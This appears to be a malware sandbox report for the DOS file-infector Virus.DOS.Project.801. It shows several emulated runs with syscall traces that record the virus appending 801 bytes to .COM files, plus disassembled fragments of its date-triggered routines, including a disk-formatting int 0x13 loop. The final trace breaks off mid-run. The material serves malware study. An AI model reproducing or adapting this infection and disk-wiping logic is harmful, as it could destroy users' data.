Sample viewer

vx.netlux.org/Virus.DOS.Project.801

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:31:36.66500678Z 26 PC: 15157 | Set disk transfer address
2018-12-17T22:31:36.66662751Z 26 PC: 15171 | Set disk transfer address
2018-12-17T22:31:36.668450869Z 71 PC: 1517b | Get current directory
2018-12-17T22:31:36.671984283Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-17T22:31:36.674814682Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-17T22:31:36.678572548Z 78 PC: 1519f | Find first file
2018-12-17T22:31:36.685375312Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:31:36.692872865Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:31:36.708793454Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:31:36.716531042Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 6)
2018-12-17T22:31:36.720056777Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.723182077Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 6)
2018-12-17T22:31:36.745760492Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:36.747422253Z 62 PC: 1524d | Close file
2018-12-17T22:31:36.756427027Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:36.7594344Z 61 PC: 15259 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:31:36.766880469Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 6)
2018-12-17T22:31:36.774389833Z 61 PC: 15259 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:31:36.782438361Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 7)
2018-12-17T22:31:36.786103981Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.788256923Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 7)
2018-12-17T22:31:36.798243004Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:36.800328785Z 62 PC: 1524d | Close file
2018-12-17T22:31:36.8101284Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:36.81412887Z 61 PC: 15259 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:31:36.821676167Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 7)
2018-12-17T22:31:36.829075752Z 61 PC: 15259 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:31:36.837514641Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 8)
2018-12-17T22:31:36.841037893Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.843049126Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 8)
2018-12-17T22:31:36.853277391Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:36.855158806Z 62 PC: 1524d | Close file
2018-12-17T22:31:36.863853364Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:36.867920963Z 61 PC: 15259 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:31:36.875795644Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 8)
2018-12-17T22:31:36.883060912Z 61 PC: 15259 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:31:36.891116285Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 9)
2018-12-17T22:31:36.895034141Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.897013827Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 9)
2018-12-17T22:31:36.90624874Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:36.913830812Z 62 PC: 1524d | Close file
2018-12-17T22:31:36.922626569Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:36.925551046Z 61 PC: 15259 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:31:36.935647236Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 9)
2018-12-17T22:31:36.943401077Z 61 PC: 15259 | Open file (Filename = 'PRINTA~1.COM�')
2018-12-17T22:31:36.948926283Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 2)
2018-12-17T22:31:36.953101963Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.95560664Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 2)
2018-12-17T22:31:36.959302001Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:36.962161984Z 62 PC: 1524d | Close file
2018-12-17T22:31:36.964447364Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:36.968021543Z 61 PC: 15259 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:31:36.976177094Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:31:36.983855386Z 61 PC: 15259 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:31:36.99172331Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 10)
2018-12-17T22:31:36.995260072Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.998179415Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 10)
2018-12-17T22:31:37.008729548Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:37.010895133Z 62 PC: 1524d | Close file
2018-12-17T22:31:37.020425707Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:37.023379896Z 61 PC: 15259 | Open file (Filename = 'PAH.COM')
2018-12-17T22:31:37.030727516Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 10)
2018-12-17T22:31:37.039082516Z 61 PC: 15259 | Open file (Filename = 'PAH.COM')
2018-12-17T22:31:37.046572776Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 11)
2018-12-17T22:31:37.04983548Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:37.052010766Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 11)
2018-12-17T22:31:37.060956501Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:37.06324295Z 62 PC: 1524d | Close file
2018-12-17T22:31:37.073381682Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:37.076469927Z 61 PC: 15259 | Open file (Filename = 'TEST.COM')
2018-12-17T22:31:37.083816536Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 11)
2018-12-17T22:31:37.086735552Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:37.089688456Z 59 PC: 151b5 | Change current directory
2018-12-17T22:31:37.094291826Z 59 PC: 1518c | Change current directory
2018-12-17T22:31:37.096186554Z 26 PC: 15193 | Set disk transfer address
2018-12-17T22:31:37.098494358Z 9 PC: 12aa4 | Display string (String= ' This file is infected with a virus! Pre infection file size = 10,000 ')
2018-12-17T22:31:37.108340996Z 76 PC: 12aa9 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":30,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:04.550343762Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:04.552169527Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:04.553494908Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:04.556412823Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:04.566273489Z 9 PC: 15275 | Display string (Could not find end pointer)
2018-12-25T11:55:04.571510032Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:04.573651184Z 78 PC: 1519f | Find first file
2018-12-25T11:55:04.58194859Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:04.588729923Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:04.594794965Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:04.601442742Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 6)
2018-12-25T11:55:04.603953568Z 66 PC: 1522f | Move file pointer
2018-12-25T11:55:04.605146507Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 6)
2018-12-25T11:55:05.641473586Z 87 PC: 15249 | Get or set file date and time
2018-12-25T11:55:05.643365026Z 62 PC: 1524d | Close file
2018-12-25T11:55:05.65075047Z 79 PC: 151a8 | Find next file
2018-12-25T11:55:05.654212532Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.671717835Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.677984443Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.684987419Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.689057745Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.690809294Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.69938738Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.701558701Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.71031587Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.713722507Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.722575103Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.729698361Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.736799167Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.740513231Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.742036241Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.751219438Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.753405595Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.761772417Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.764326454Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.772351798Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.779301206Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.786073845Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.790757388Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.792222684Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.800205811Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.802750485Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.811046908Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.813536193Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.821024875Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.82741081Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.831984816Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.835485234Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.836912078Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.839671043Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.84135694Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.844252726Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.847104991Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.85433241Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.861670918Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.868126388Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.871132047Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.873041939Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.881447636Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.883156733Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.890649255Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.893053123Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.899273661Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.905741214Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.912668455Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.915280519Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.917109857Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.925232679Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.926908835Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.934899209Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.937274538Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.943606982Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.946635907Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.949061924Z 59 PC: 151b5 | Change current directory
2018-12-25T11:55:05.95299502Z 59 PC: 1518c | Change current directory
2018-12-25T11:55:05.956121818Z 26 PC: 15193 | Set disk transfer address
2018-12-25T11:55:05.957231111Z 9 PC: 12aa4 | Display string (String= ' This file is infected with a virus! Pre infection file size = 10,000 ')
2018-12-25T11:55:05.96085694Z 76 PC: 12aa9 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:04.573872676Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:04.575598482Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:04.576814024Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:04.579613603Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:04.583026389Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:04.587509804Z 61 PC: 15259 | Open file (Filename = 'HOSTA.COM')
2018-12-25T11:55:04.593701705Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 2)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:04.651266553Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:04.652921073Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:04.65390998Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:04.656546041Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:04.659423192Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:04.664381613Z 61 PC: 15259 | Open file (Filename = 'HOSTA.COM')
2018-12-25T11:55:04.670402182Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 2)

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:05.386499115Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:05.388108886Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:05.389195466Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:05.39214431Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:05.394835501Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:05.397094281Z 78 PC: 1519f | Find first file
2018-12-25T11:55:05.403593686Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:05.411744074Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:05.418835592Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.426504776Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 6)
2018-12-25T11:55:05.430335686Z 66 PC: 1522f | Move file pointer
2018-12-25T11:55:05.431925839Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 6)
2018-12-25T11:55:05.447646021Z 87 PC: 15249 | Get or set file date and time
2018-12-25T11:55:05.450034113Z 62 PC: 1524d | Close file
2018-12-25T11:55:05.458949841Z 79 PC: 151a8 | Find next file
2018-12-25T11:55:05.46206236Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.469323529Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.477684901Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.485889702Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.489087242Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.491299608Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.5009681Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.502525195Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.511779274Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.51517596Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.522994981Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.531306807Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.539486015Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.542567251Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.545447174Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.55475475Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.556505078Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.566368083Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.569655845Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.576874905Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.584005736Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.591565565Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.594535835Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.595998637Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.605897558Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.607660422Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.616498718Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.620094866Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.627304974Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.634385598Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.640277191Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.643482818Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.645358599Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.64935357Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.651584721Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.65394566Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.657904294Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.665582105Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.673294313Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.680951406Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.684098871Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.6926504Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.703062203Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.704907548Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.713589045Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.716432486Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.724017584Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.731556935Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.739857021Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.744440577Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.746454595Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.756072728Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.758740612Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.767793149Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.770724338Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.779062138Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.781935308Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.784621066Z 59 PC: 151b5 | Change current directory
2018-12-25T11:55:05.790173516Z 59 PC: 1518c | Change current directory
2018-12-25T11:55:05.792191861Z 26 PC: 15193 | Set disk transfer address
2018-12-25T11:55:05.793513123Z 9 PC: 12aa4 | Display string (String= ' This file is infected with a virus! Pre infection file size = 10,000 ')
2018-12-25T11:55:05.803078762Z 76 PC: 12aa9 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:05.576860475Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:05.579186744Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:05.581126612Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:05.584153484Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:05.586415381Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:05.59190209Z 61 PC: 15259 | Open file (Filename = 'HOSTA.COM')
2018-12-25T11:55:05.59945699Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 2)

{"DateBased":true,"Day":30,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:05.879164658Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:05.880872659Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:05.882206147Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:05.885002077Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:05.895367092Z 9 PC: 15275 | Display string (Could not find end pointer)
2018-12-25T11:55:05.900540569Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
